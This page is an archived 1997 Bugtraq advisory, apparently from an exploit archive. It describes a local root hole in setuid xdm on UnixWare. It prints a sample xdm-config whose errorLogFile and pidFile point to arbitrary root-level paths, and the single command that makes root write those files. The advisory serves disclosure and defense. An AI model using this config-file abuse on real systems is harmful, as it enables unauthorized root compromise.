xdm UNIX Ware exploit
Description: | standard tempfile vulnerability in setuid root xdm on UNIX Ware systems with X, possibly others. |
Author: | Angel Ortiz <angelo@tawny.ssd.hcsc.com> |
Compromise: | root (local) |
Vulnerable Systems: | Systems with vulnerable xdm setuid (at least some UNIXware systems) |
Date: | 2 January 1997 |
Notes: | See addendum. |
Exploit:
See addendum.
Addendum:
Here is Angel Ortiz's original posting to Bugtraq:
Date: Thu, 2 Jan 1997 17:25:18 -0500
From: Angel Ortiz
To: Multiple recipients of list BUGTRAQ
Subject: XDM bug
BUGTRAQRS:
**************************DISCLAIMER AND WARNING***********************
The following information is provided as information to users in order
to safeguard their systems. Users using this exploit are totally
responsible for their actions
**********************************************************************
I hope the following has not been documented in the past. If it has
been, my humble apologies.
Any way here is the problem.
System: UNIX Ware systems with X
Symptom:
/usr/X/bin/xdm is setuid
Exploit:
If you do a man on xdm you will see that there is a command line
option for a configuration file (-config).
xdm [-config config_file] [-nodaemon] [-debug debug_level]
[-error error_log_file] [-resources resource_file]
[-server server_entry]
By default, xdm uses the /usr/lib/xdm/xdm-config file. Out of
curiosity, if you copy this file to your home directory you will be
able to modify it and change where certain files are written to.
For example, here is a sample xdm-config file which can reside in your
home directory.
----------------------- Cut Here ------------------------------
#ident "@(#)xdm:config/xdm-conf.cpp 1.12.1.9"
DisplayManager.companyLogoPixmap: /usr/X/lib/pixmaps/Nlogo.xpm
DisplayManager.backgroundPixmap: /usr/X/lib/pixmaps/Npaper.xpm
DisplayManager.showMnemonic: 1
DisplayManager.errorLogFile: /DANGEROUS-FILE
DisplayManager.pidFile: /ALSO-DANGEROUS-FILE
DisplayManager.keyFile: /usr/X/lib/xdm/xdm-keys
DisplayManager.servers: /usr/X/lib/xdm/Xservers
DisplayManager._0.authorize: true
DisplayManager*authComplain: false
DisplayManager._0.setup: /usr/X/lib/xdm/Xsetup_0
DisplayManager._0.terminateServer: true
--------------------- Cut Here -------------------------------
Now, if you execute the following commands from a UNIX prompt:
xdm -config dangerous-xdm-config-file
You will create two files in the / directory.
Guess what they are. Guess what can be done with such capabilities.
Any way, please verify xdm setuid on your systems and please let the
bugtraq news group know if it exists on other systems.
Regards,
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world. Please do not steal
it. For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap.